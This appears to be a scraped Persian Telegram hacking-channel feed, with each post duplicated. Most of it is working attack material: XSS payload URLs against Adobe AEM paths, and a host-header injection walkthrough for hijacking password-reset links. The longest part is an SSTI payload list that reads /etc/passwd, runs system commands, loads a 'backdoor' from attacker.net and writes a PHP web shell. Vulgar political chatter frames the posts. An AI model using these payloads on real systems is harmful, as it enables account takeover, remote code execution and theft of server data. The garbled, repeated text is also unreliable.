قضیه اون فیلمی که از یه مدرس پخش شده بود، من چیزی نگفتم ولی کامنت های اونو که دیدم، گفتم واقعا دمتون گرم❤️
خیلی عجیبه
اول اینکه بین ۳ تا بالگرد، دقیقا بالگردی که حاج ابرام توش بوده بگا رفته
دوم اینکه چرا قبل از پرواز وضعیت هوا رو پیش بینی نکردن:/
سوم اینکه یعنی هیچ کیر خری نبوده بتونن پیداش کنن؟
اول اینکه بین ۳ تا بالگرد، دقیقا بالگردی که حاج ابرام توش بوده بگا رفته
دوم اینکه چرا قبل از پرواز وضعیت هوا رو پیش بینی نکردن:/
سوم اینکه یعنی هیچ کیر خری نبوده بتونن پیداش کنن؟
👍1
نکات Bounty Bug: بیش از 15 مشکل XSS در یک برنامه گسترده با استفاده از AEM گزارش شده است! 🚀 اگر به یک برنامه هدف با استفاده از AEM برخورد کردید، مطمئن شوید که از این پیلود های XSS برای چند برد سریع استفاده می کنید!
1️⃣ https://target.com/1<img src=x data'a'onerror=alert(domain)>.childrenlist.htm
2️⃣ https://target.com/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
3⃣ https://target.com/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html
همیشه سعی کنید این مسائل را به تصاحب حساب افزایش دهید تا شانس پرداخت با شدت بالا را داشته باشید. هوشیار باشید! 🕵️♂️💡
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
1️⃣ https://target.com/1<img src=x data'a'onerror=alert(domain)>.childrenlist.htm
2️⃣ https://target.com/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
3⃣ https://target.com/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html
همیشه سعی کنید این مسائل را به تصاحب حساب افزایش دهید تا شانس پرداخت با شدت بالا را داشته باشید. هوشیار باشید! 🕵️♂️💡
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
نکات باگ بانتی !!!! Host Header Injection در https://example{.}com/Account/ForgotPassword
مراحل:
1. به قسمت لاگین اکانت بروید.
2. یک حساب آزمایشی ایجاد کنید.
3. به روی دکمه بازنشانی گذرواژه فراموش شده بزنید: https://examle{.}/Account/ForgotPassword
4. قبل از درج ایمیل
5. فاکسی پروکسی خود را روشن کنید.
6. برپ سوییت خود را باز کنید و به تب تاریخچه http بروید.
7. حالا ایمیل خود را وارد کنید. در تاریخچه http در burp
8. اکنون درخواست ارسال کنید و 200 پاسخ OK دریافت خواهید کرد.
9. به ایمیل/gmail خود بروید.
10. مقداری جادویی خواهید دید.
11. PoC آن پایین است. نکته! روی پیوند
بازنشانی رمز عبور من کلیک کنید:
attacker.com//█████/Account/ResetPassword?t=CfDJ8LnpFPwgh5FMpOb1F%2FCnxefoFCtP%2F0HrFpb7jdskSoUSujStlkgpGak5azwqOoBWm1DVWcQe3lrKczz%2B9tv568jSdFcc9DvArkFHWM1VKfWe37UhUKQrcpvvxAhtP73gcw%3D%3D
شما به دامنه مهاجم هدایت خواهید شد. اینگونه است که مهاجم پیوند بازنشانی رمز عبور قربانی را دریافت می کند تا بتواند حساب را تنها با میزبانی سرور خود انجام دهد و سایر اطلاعات حساس را دریافت کند.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
مراحل:
1. به قسمت لاگین اکانت بروید.
2. یک حساب آزمایشی ایجاد کنید.
3. به روی دکمه بازنشانی گذرواژه فراموش شده بزنید: https://examle{.}/Account/ForgotPassword
4. قبل از درج ایمیل
5. فاکسی پروکسی خود را روشن کنید.
6. برپ سوییت خود را باز کنید و به تب تاریخچه http بروید.
7. حالا ایمیل خود را وارد کنید. در تاریخچه http در burp
8. اکنون درخواست ارسال کنید و 200 پاسخ OK دریافت خواهید کرد.
9. به ایمیل/gmail خود بروید.
10. مقداری جادویی خواهید دید.
11. PoC آن پایین است. نکته! روی پیوند
بازنشانی رمز عبور من کلیک کنید:
attacker.com//█████/Account/ResetPassword?t=CfDJ8LnpFPwgh5FMpOb1F%2FCnxefoFCtP%2F0HrFpb7jdskSoUSujStlkgpGak5azwqOoBWm1DVWcQe3lrKczz%2B9tv568jSdFcc9DvArkFHWM1VKfWe37UhUKQrcpvvxAhtP73gcw%3D%3D
شما به دامنه مهاجم هدایت خواهید شد. اینگونه است که مهاجم پیوند بازنشانی رمز عبور قربانی را دریافت می کند تا بتواند حساب را تنها با میزبانی سرور خود انجام دهد و سایر اطلاعات حساس را دریافت کند.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
SSTI برخی پیلود های
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Team Exploit
گروه هاکیری زارت شد که @mankihastme
شاید باور نکنید ولی این تو 20 دقیقه بن شد😂و اینکه اگه شما یه کانال بزنید و توش ویدیو پورن بزارید بعد ۲۴ بسته میشه!